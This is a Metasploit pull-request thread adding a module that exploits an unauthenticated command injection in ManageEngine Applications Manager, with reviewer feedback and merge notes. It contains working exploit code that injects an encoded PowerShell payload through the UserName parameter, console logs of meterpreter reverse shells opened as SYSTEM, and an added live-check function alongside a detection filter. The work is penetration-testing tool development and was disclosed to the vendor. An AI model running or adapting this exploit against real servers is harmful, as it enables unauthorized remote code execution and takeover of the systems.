
Adding ManageEngine Application Manager RCE #9684

Merged
merged 7 commits into from Mar 27, 2018

8 participants
@mmetince
Contributor

mmetince commented Mar 7, 2018

This module exploits a command injection vulnerability (0day as far as I know) in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user.

A successful check of the exploit will look like this:

  • Start `msfconsole`
  • `use exploit/linux/http/securityonion_xplico_exec`
  • Set `RHOST`
  • Set `PAYLOAD windows/meterpreter/reverse_tcp`
  • Set `LHOST`
  • Run `check`
  • Verify that you are seeing `The target is vulnerable.` in console.
  • Run `exploit`
  • Verify that you are seeing `Triggering the vulnerability` in console.
  • Verify that you are seeing `Sending stage (179779 bytes) to <TARGET>` in console.
  • Verify that you have your shell.

Scenarios

msf5 > 
msf5 > use exploit/windows/http/manageengine_appmanager_exec 
msf5 exploit(windows/http/manageengine_appmanager_exec) > set RHOST 12.0.0.192
RHOST => 12.0.0.192
msf5 exploit(windows/http/manageengine_appmanager_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/manageengine_appmanager_exec) > set LHOST 12.0.0.1
LHOST => 12.0.0.1
msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 12.0.0.192:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 12.0.0.1:4444 
[*] Triggering the vulnerability
[*] Sending stage (179779 bytes) to 12.0.0.192

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Technical Details and Module Demo
https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/

@jmartin-r7 jmartin-r7 requested a review from todb-r7 Mar 7, 2018

mmetince added some commits Mar 9, 2018

@mmetince


Contributor

mmetince commented Mar 12, 2018

This was my first time using rubocop. I don't know how to fix the following errors.

RuboCop: Layout/AlignParameters: Align the parameters of a method call if they span more than one line. [Layout/AlignParameters]
RuboCop: Layout/ClosingParenthesisIndentation: Align `)` with `(`. [Layout/ClosingParenthesisIndentation]
RuboCop: Layout/MultilineMethodCallBraceLayout: Closing method call brace must be on the same line as the last argument when opening brace is on the same line as the first argument. [Layout/MultilineMethodCallBraceLayout]

Those errors are mostly related to the indentation of the parameters of the update_info method (name, description, etc.) and the position of ( and ).

Any idea how to fix them too? Or should I ignore them by updating the .rubocop.yml file?

@wvu-r7


Contributor

wvu-r7 commented Mar 12, 2018

@mmetince: You can read about the layout cops at https://rubocop.readthedocs.io/en/latest/cops_layout/.

You can also read its parent doc at https://github.com/bbatsov/ruby-style-guide. Cheers!

@mmetince


Contributor

mmetince commented Mar 13, 2018

Thanks @wvu-r7, I've solved them all. 👍
Looking forward to the review now ^^

Go to following website and download Windows version of the product. It comes with built-in Java and Postgresql so you don't need to install anything else.
[https://www.manageengine.com/products/applications_manager/download.html](https://www.manageengine.com/products/applications_manager/download.html)
## Verification Steps


@bcoles

bcoles Mar 13, 2018

Contributor

These steps are a lie.

Consider:

1. Start `msfconsole`
2. `use exploit/windows/http/manageengine_appmanager_exec`
3. Set `RHOST <RHOST>`
4. Set `PAYLOAD windows/meterpreter/reverse_tcp`
5. Set `LHOST <LHOST>`
6. Run `check`
7. **Verify** that you are seeing `The target is vulnerable.` in console.
8. Run `exploit`
9. **Verify** that you are seeing `Triggering the vulnerability` in console.
10. **Verify** that you are seeing `Sending stage to <TARGET>` in console.
11. **Verify** that you have your shell.


@mmetince

mmetince Mar 13, 2018

Contributor

Oops, sorry. I forgot to update it from another module.

'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',


@bcoles

bcoles Mar 13, 2018

Contributor

Does 2013 need to be static?

'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),


@bcoles

bcoles Mar 13, 2018

Contributor

Randomization for the win:

        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
print_status('Triggering the vulnerability')
send_request_cgi(


@bcoles

bcoles Mar 13, 2018

Contributor

Does the server return a response when exploitation is successful, or does triggering the payload cause the request to timeout?

If the server returns a response, it might be nice to validate the response and print an appropriate message.


@mmetince

mmetince Mar 13, 2018

Contributor

Nope, since this is a command injection issue, a request that exploits the vulnerability will hang.

)
end
def check


@bcoles

bcoles Mar 13, 2018

Contributor

Perhaps I missed something, but it looks like the HTTP requests in the check method and the exploit method are almost identical, with the exception of the UserName.

You could create a new method which takes a username parameter and returns the result of the send_request_cgi call, then call this method from both the check method and exploit method.

Not required, but it's nice to be DRY :)

Something like this:

```ruby
  # Shared request builder: check and exploit differ only in the UserName value,
  # which is the injection point.
  def test_credential(username)
    send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(rand(10..15)),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(rand(3..10)),
        'UserName' => username
      }
    )
  end

  # A harmless random username still reaches the vulnerable code path; the
  # credential-failure message in the body identifies the affected handler.
  def check
    res = test_credential(Rex::Text.rand_text_alpha(rand(3..10)))

    unless res
      vprint_error('Connection failed')
      return Exploit::CheckCode::Unknown
    end

    if res.body.include?('Kindly check the credentials and try again')
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  # The username is wrapped in a PowerShell subexpression so that the encoded
  # payload runs when the server interpolates it. The request does not return
  # while the payload is running, so no response is checked here.
  def exploit
    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)

    print_status('Triggering the vulnerability')

    test_credential("$(#{p})")
  end
```

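As an added example, not the module's code and not part of the PR, the following Ruby puts the request shown in the suggestion above and the check method's response test into stand-alone functions, adds the read-timeout handling that the hanging exploit request (discussed earlier in this thread) calls for, and adds a defender-side filter that flags the same injection pattern in captured requests. The target host and port, the `probe` display name, the constructed sample requests, and the backtick and semicolon checks in `injection_attempt?` are this example's own assumptions; only the `$(` pattern comes from the PR.

```ruby
require 'uri'
require 'net/http'

# Response fragment the PR's check method treats as proof of the vulnerable handler.
VULN_MARKER = 'Kindly check the credentials and try again'.freeze

# Form parameters of the testCredential.do POST as shown in the PR. Only
# UserName varies; it is the value the server interpolates into PowerShell.
# The 'probe' display name and the placeholder password are assumptions.
def test_credential_params(username)
  {
    'method'            => 'testCredentialForConfMonitors',
    'type'              => 'OfficeSharePointServer',
    'montype'           => 'OfficeSharePointServer',
    'isAgentEnabled'    => 'NO',
    'isAgentAssociated' => 'false',
    'displayname'       => 'probe',
    'HostName'          => '127.0.0.1',
    'Version'           => '2013',
    'Powershell'        => 'True',
    'CredSSP'           => 'False',
    'SPType'            => 'SPServer',
    'CredentialDetails' => 'nocm',
    'Password'          => 'x',
    'UserName'          => username
  }
end

# Wrap a PowerShell command in a subexpression, mirroring "$(#{p})" in the PR.
def injected_username(ps_command)
  "$(#{ps_command})"
end

# Same decision the module's check method makes on a response body.
def classify(body)
  return :unknown if body.nil?
  body.include?(VULN_MARKER) ? :vulnerable : :safe
end

# Live check against a target (not executed in this example). Port 9090 is
# the port seen in the PR's console output. A timeout or connection error
# maps to :unknown, which is also the right outcome for an exploit request
# that never returns while the payload is running.
def check_target(host, port = 9090, timeout = 10)
  http = Net::HTTP.new(host, port)
  http.open_timeout = timeout
  http.read_timeout = timeout
  res = http.post('/testCredential.do',
                  URI.encode_www_form(test_credential_params('probe')),
                  'Content-Type' => 'application/x-www-form-urlencoded')
  classify(res.body)
rescue Net::OpenTimeout, Net::ReadTimeout, SystemCallError
  :unknown
end

# Defender side: flag a POST to testCredential.do whose UserName carries a
# PowerShell subexpression. "$(" is what the PR's payload uses; the backtick
# and semicolon checks are this example's own generalisation.
def injection_attempt?(path, body)
  return false unless path.end_with?('testCredential.do')
  params = URI.decode_www_form(body).to_h
  return false unless params['Powershell'].to_s.casecmp?('true')
  user = params['UserName'].to_s
  user.include?('$(') || user.include?('`') || user.include?(';')
end

# Constructed sample requests (path, body) as a reverse proxy might log them:
# one legitimate credential test, one injection attempt, one unrelated request.
SAMPLE_REQUESTS = [
  ['/testCredential.do', URI.encode_www_form(test_credential_params('svc_sp'))],
  ['/testCredential.do', URI.encode_www_form(test_credential_params(injected_username('calc.exe')))],
  ['/index.do', 'method=home']
].freeze

def flagged_requests(requests = SAMPLE_REQUESTS)
  requests.select { |path, body| injection_attempt?(path, body) }
end
```

`check_target` is the only function that touches the network; everything else runs offline on the constructed requests, so the classification and the filter can be exercised without an Applications Manager instance. The filter keys on `Powershell=True` because that is the parameter combination the PR's request uses; a detection that ignores it would miss nothing here but would fire on unrelated monitor types.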

@mmetince

mmetince Mar 13, 2018

Contributor

Couldn't agree more. Done^^

@todb-r7


Contributor

todb-r7 commented Mar 13, 2018

While letting the vendor know about this bug, I notice that their bug bounty calls it Applications Manager (note the plural). Just fyi. I wonder how many of our modules are incorrect.

@todb-r7


Contributor

todb-r7 commented Mar 13, 2018

There, let the vendor know, they're tracking it as ZVE-2018-0492, in case you haven't done this already, @mmetince

@todb-r7

Left a comment but it's a tiny nit to pick. We probably need to grep through the other modules for this inconsistency, so don't consider this a hold up.

super(update_info(info,
'Name' => "ManageEngine Applications Manager Remote Code Execution",
'Description' => %q(
This module exploits command injection vulnerability in the ManageEngine Application Manager product.


@todb-r7

todb-r7 Mar 13, 2018

Contributor

Should be Applications Manager, not Application Manager (apparently)

@mmetince


Contributor

mmetince commented Mar 13, 2018

I will replace "application" with "applications", thank you very much @todb-r7.
Please let me know if I need to do other changes so I can fix them all within single commit.

@bcoles

bcoles approved these changes Mar 14, 2018

A couple of tiny nitpicks with the grammar in the description.

It may also be worth adding the
[ 'BID' => '103358' ]
and patch URL
[ 'URL' => 'https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager' ]
to the References array.

Approved, but untested.

@gokhansagoglu


gokhansagoglu commented Mar 19, 2018

It works very well. Tested using Applications Manager build 13630 on Windows 8.1 Pro.

[screenshot: meterpreter session, Mar 19 23:35]

Great job!

@wchen-r7


Contributor

wchen-r7 commented Mar 27, 2018

Love ManageEngine vulns.

@wchen-r7 wchen-r7 self-assigned this Mar 27, 2018

@wchen-r7


Contributor

wchen-r7 commented Mar 27, 2018

Works for me:

msf5 exploit(windows/http/manageengine_appmanager_exec) > check
[+] 172.16.249.180:9090 The target is vulnerable.
msf5 exploit(windows/http/manageengine_appmanager_exec) > run

[*] Started reverse TCP handler on 172.16.249.1:4444 
[*] Triggering the vulnerability
[*] Sending stage (180291 bytes) to 172.16.249.180
[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.180:50377) at 2018-03-27 15:13:14 -0500

@wchen-r7 wchen-r7 merged commit 53eabfc into rapid7:master Mar 27, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully ran sanity checks.
Metasploit Automation - Test Execution: Successfully ran `autoPayloadTest.py`.
continuous-integration/travis-ci/pr: The Travis CI build passed.

wchen-r7 added a commit that referenced this pull request Mar 27, 2018

@wchen-r7


Contributor

wchen-r7 commented Mar 27, 2018

Release Notes

The exploits/windows/http/manageengine_appmanager_exec module has been added to the framework. It exploits a command injection vulnerability in the ManageEngine Application Manager product. An unauthenticated user can execute an operating system command under the context of a privileged user.

msjenkins-r7 added a commit that referenced this pull request Mar 27, 2018
